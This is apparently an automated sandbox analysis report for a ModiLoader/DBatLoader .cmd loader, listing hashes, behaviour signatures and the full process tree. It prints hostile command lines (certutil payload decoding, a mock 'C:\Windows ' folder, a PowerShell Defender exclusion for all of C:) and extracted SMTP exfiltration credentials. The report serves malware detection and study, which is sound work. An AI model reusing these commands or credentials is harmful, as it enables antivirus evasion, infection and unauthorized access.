Analysis
-
max time kernel
141s -
max time network
127s -
platform
windows10-2004_x64 -
resource
win10v2004-20240611-en -
resource tags
arch:x64arch:x86image:win10v2004-20240611-enlocale:en-usos:windows10-2004-x64system -
submitted
21-06-2024 02:00
Static task
static1
Behavioral task
behavioral1
Sample
lNV-9088759885958.cmd
Resource
win7-20240508-en
Behavioral task
behavioral2
Sample
lNV-9088759885958.cmd
Resource
win10v2004-20240611-en
General
-
Target
lNV-9088759885958.cmd
-
Size
4.1MB
-
MD5
75a6cb4a92d02ef6c1bf0e5088190cb9
-
SHA1
e99ebb72703971edc6e73f50b03b833fbbe0dde7
-
SHA256
5c65588d938a6d29b783795576286474107a7989112326cccbecdbdc433f41f3
-
SHA512
298ec5450835768029318bfb045de38b501eeb41c74e98d4c569da38ca2768fe026b9febc968508857fc9bfcdd3ac6cb4d8c640cdc2631d989e865bc4a2b2af2
-
SSDEEP
49152:50zbEfxlWCpt6Tz5d1ej30RxqEc0Z6oJYLmNfLIewZTJN6666Iuq66fKID6+6I6h:r
Malware Config
Extracted
Protocol: smtp- Host:
mail.suryaberkatindonesia.com - Port:
587 - Username:
[email protected] - Password:
suryaber123
Signatures
-
ModiLoader, DBatLoader
ModiLoader is a Delphi loader that misuses cloud services to download other malicious families.
-
ModiLoader Second Stage 2 IoCs
Processes:
resource yara_rule behavioral2/memory/3680-56-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 behavioral2/memory/3680-59-0x0000000000400000-0x0000000001400000-memory.dmp modiloader_stage2 -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Executes dropped EXE 10 IoCs
Processes:
alpha.exealpha.exekn.exealpha.exekn.exeAudio.pifalpha.exealpha.execmd.pifuiuyfdvN.pifpid process 2696 alpha.exe 2412 alpha.exe 1668 kn.exe 4708 alpha.exe 1992 kn.exe 1916 Audio.pif 2220 alpha.exe 4896 alpha.exe 332 cmd.pif 3680 uiuyfdvN.pif -
Loads dropped DLL 1 IoCs
Processes:
cmd.pifpid process 332 cmd.pif -
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Adds Run key to start application 2 TTPs 2 IoCs
Processes:
Audio.pifuiuyfdvN.pifdescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Nvdfyuiu = "C:\\Users\\Public\\Nvdfyuiu.url" Audio.pif Set value (str) \REGISTRY\USER\S-1-5-21-3665033694-1447845302-680750983-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\windows = "C:\\Users\\Admin\\AppData\\Roaming\\windows\\windows.exe" uiuyfdvN.pif -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 36 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
Processes:
Audio.pifdescription pid process target process PID 1916 set thread context of 3680 1916 Audio.pif uiuyfdvN.pif -
Script User-Agent 2 IoCs
Uses user-agent string associated with script host/environment.
Processes:
description flow ioc HTTP User-Agent header 26 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) HTTP User-Agent header 28 Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exeuiuyfdvN.pifpid process 4628 powershell.exe 4628 powershell.exe 4628 powershell.exe 3680 uiuyfdvN.pif 3680 uiuyfdvN.pif 3680 uiuyfdvN.pif -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeuiuyfdvN.pifdescription pid process Token: SeDebugPrivilege 4628 powershell.exe Token: SeDebugPrivilege 3680 uiuyfdvN.pif -
Suspicious use of WriteProcessMemory 42 IoCs
Processes:
cmd.exealpha.exealpha.exealpha.exeAudio.pifcmd.execmd.pifdescription pid process target process PID 2516 wrote to memory of 3408 2516 cmd.exe extrac32.exe PID 2516 wrote to memory of 3408 2516 cmd.exe extrac32.exe PID 2516 wrote to memory of 2696 2516 cmd.exe alpha.exe PID 2516 wrote to memory of 2696 2516 cmd.exe alpha.exe PID 2696 wrote to memory of 1516 2696 alpha.exe extrac32.exe PID 2696 wrote to memory of 1516 2696 alpha.exe extrac32.exe PID 2516 wrote to memory of 2412 2516 cmd.exe alpha.exe PID 2516 wrote to memory of 2412 2516 cmd.exe alpha.exe PID 2412 wrote to memory of 1668 2412 alpha.exe kn.exe PID 2412 wrote to memory of 1668 2412 alpha.exe kn.exe PID 2516 wrote to memory of 4708 2516 cmd.exe alpha.exe PID 2516 wrote to memory of 4708 2516 cmd.exe alpha.exe PID 4708 wrote to memory of 1992 4708 alpha.exe kn.exe PID 4708 wrote to memory of 1992 4708 alpha.exe kn.exe PID 2516 wrote to memory of 1916 2516 cmd.exe Audio.pif PID 2516 wrote to memory of 1916 2516 cmd.exe Audio.pif PID 2516 wrote to memory of 1916 2516 cmd.exe Audio.pif PID 2516 wrote to memory of 2220 2516 cmd.exe alpha.exe PID 2516 wrote to memory of 2220 2516 cmd.exe alpha.exe PID 2516 wrote to memory of 4896 2516 cmd.exe alpha.exe PID 2516 wrote to memory of 4896 2516 cmd.exe alpha.exe PID 1916 wrote to memory of 2872 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 2872 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 2872 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 1952 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 1952 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 1952 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 2488 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 2488 1916 Audio.pif cmd.exe PID 1916 wrote to memory of 2488 1916 Audio.pif cmd.exe PID 2488 wrote to memory of 332 2488 cmd.exe cmd.pif PID 2488 wrote to memory of 332 2488 cmd.exe cmd.pif PID 332 wrote to memory of 4628 332 cmd.pif powershell.exe PID 332 wrote to memory of 4628 332 cmd.pif powershell.exe PID 1916 wrote to memory of 4164 1916 Audio.pif extrac32.exe PID 1916 wrote to memory of 4164 1916 Audio.pif extrac32.exe PID 1916 wrote to memory of 4164 1916 Audio.pif extrac32.exe PID 1916 wrote to memory of 3680 1916 Audio.pif uiuyfdvN.pif PID 1916 wrote to memory of 3680 1916 Audio.pif uiuyfdvN.pif PID 1916 wrote to memory of 3680 1916 Audio.pif uiuyfdvN.pif PID 1916 wrote to memory of 3680 1916 Audio.pif uiuyfdvN.pif PID 1916 wrote to memory of 3680 1916 Audio.pif uiuyfdvN.pif
Processes
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\lNV-9088759885958.cmd"1⤵
- Suspicious use of WriteProcessMemory
PID:2516 -
C:\Windows\System32\extrac32.exeC:\\Windows\\System32\\extrac32 /C /Y C:\\Windows\\System32\\cmd.exe "C:\\Users\\Public\\alpha.exe"2⤵PID:3408
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c extrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\system32\extrac32.exeextrac32 /C /Y C:\\Windows\\System32\\certutil.exe C:\\Users\\Public\\kn.exe3⤵PID:1516
-
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\lNV-9088759885958.cmd" "C:\\Users\\Public\\Audio.mp4" 92⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2412 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\Users\Admin\AppData\Local\Temp\lNV-9088759885958.cmd" "C:\\Users\\Public\\Audio.mp4" 93⤵
- Executes dropped EXE
PID:1668 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c C:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 122⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4708 -
C:\Users\Public\kn.exeC:\\Users\\Public\\kn -decodehex -F "C:\\Users\\Public\\Audio.mp4" "C:\\Users\\Public\\Libraries\\Audio.pif" 123⤵
- Executes dropped EXE
PID:1992 -
C:\Users\Public\Libraries\Audio.pifC:\Users\Public\Libraries\Audio.pif2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1916 -
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows "3⤵PID:2872
-
C:\Windows\SysWOW64\cmd.execmd /c mkdir "\\?\C:\Windows \System32"3⤵PID:1952
-
C:\Windows\SysWOW64\cmd.execmd /c "C:\\Windows \\System32\\cmd.pif"3⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows \System32\cmd.pif"C:\\Windows \\System32\\cmd.pif"4⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
PID:332 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath 'C:'5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4628 -
C:\Windows\SysWOW64\extrac32.exeC:\\Windows\\System32\\extrac32.exe /C /Y C:\Users\Public\Libraries\Audio.pif C:\\Users\\Public\\Libraries\\Nvdfyuiu.PIF3⤵PID:4164
-
C:\Users\Public\Libraries\uiuyfdvN.pifC:\Users\Public\Libraries\uiuyfdvN.pif3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3680 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\kn.exe" / A / F / Q / S2⤵
- Executes dropped EXE
PID:2220 -
C:\Users\Public\alpha.exeC:\\Users\\Public\\alpha /c del /q "C:\Users\Public\Audio.mp4" / A / F / Q / S2⤵
- Executes dropped EXE
PID:4896
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --field-trial-handle=4296,i,3595107284059830391,18018199024659337217,262144 --variations-seed-version --mojo-platform-channel-handle=4112 /prefetch:81⤵PID:408
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
3.0MB
MD524eca41b035ab826934e998b874398b0
SHA15da0772e30198aa9f489de683880f3b14be6d916
SHA256716743d7e555b18a15ad8aa93ab7b87c456d556425fe716c2b00461973af6c55
SHA5122b4d1b4e623d4e0109403fa8f6f9ddc7a0ff9ac0f6f7373ce1f2c66afe5d926f04b20d0bed85ffe7e254d5f2134af4c322a1aebba15e3bdb0f566ab973855484
-
Filesize
1.5MB
MD5ab0d98b37da9c1bd33adec509689fa4e
SHA14ca1a3f7bd543878dce7104473ee43b2ab783628
SHA25678e62a907f38c42e9eb2ef88ebab24a157e68eeba1210b4d6a2aa0eb919202ff
SHA512d581f6a466c6e432a08b3a550179f88a6bb9cdeba8d0ba97e609201841442014dc04f4170c11ee2f776170941421dfe0873c705785a60301dc4e60668a574567
-
Filesize
182KB
MD53776012e2ef5a5cae6935853e6ca79b2
SHA14fc81df94baaaa550473ac9d20763cfb786577ff
SHA2568e104cc58e62de0eab837ac09b01d30e85f79045cc1803fa2ef4eafbdbd41e8d
SHA51238811cb1431e8b7b07113ae54f1531f8992bd0e572d9daa1029cf8692396427285a4c089ffd56422ca0c6b393e9fca0856a5a5cd77062e7e71bf0a670843cfb8
-
Filesize
283KB
MD58a2122e8162dbef04694b9c3e0b6cdee
SHA1f1efb0fddc156e4c61c5f78a54700e4e7984d55d
SHA256b99d61d874728edc0918ca0eb10eab93d381e7367e377406e65963366c874450
SHA51299e784141193275d4364ba1b8762b07cc150ca3cb7e9aa1d4386ba1fa87e073d0500e61572f8d1b071f2faa2a51bb123e12d9d07054b59a1a2fd768ad9f24397
-
Filesize
1.6MB
MD5bd8d9943a9b1def98eb83e0fa48796c2
SHA170e89852f023ab7cde0173eda1208dbb580f1e4f
SHA2568de7b4eb1301d6cbe4ea2c8d13b83280453eb64e3b3c80756bbd1560d65ca4d2
SHA51295630fdddad5db60cc97ec76ee1ca02dbb00ee3de7d6957ecda8968570e067ab2a9df1cc07a3ce61161a994acbe8417c83661320b54d04609818009a82552f7b
-
Filesize
94KB
MD5869640d0a3f838694ab4dfea9e2f544d
SHA1bdc42b280446ba53624ff23f314aadb861566832
SHA2560db4d3ffdb96d13cf3b427af8be66d985728c55ae254e4b67d287797e4c0b323
SHA5126e775cfb350415434b18427d5ff79b930ed3b0b3fc3466bc195a796c95661d4696f2d662dd0e020c3a6c3419c2734468b1d7546712ecec868d2bbfd2bc2468a7
-
Filesize
110KB
MD5a50a86252349e4536e72653145bb938f
SHA1c7602b39d739852321b1b35b9d784fdb005d1689
SHA2566c62b515d798303eae096883f66afc0150dcf2f970b4ebfe8465c990294c97ae
SHA5123c4f6025588425871466f1267dd6ba1db0e9d5e78bca1ac0375c56b8f39023cc8e41f43efbd8e30a75afc921d176bf8c4d66ae8fe28e4e8081049bac48b9433d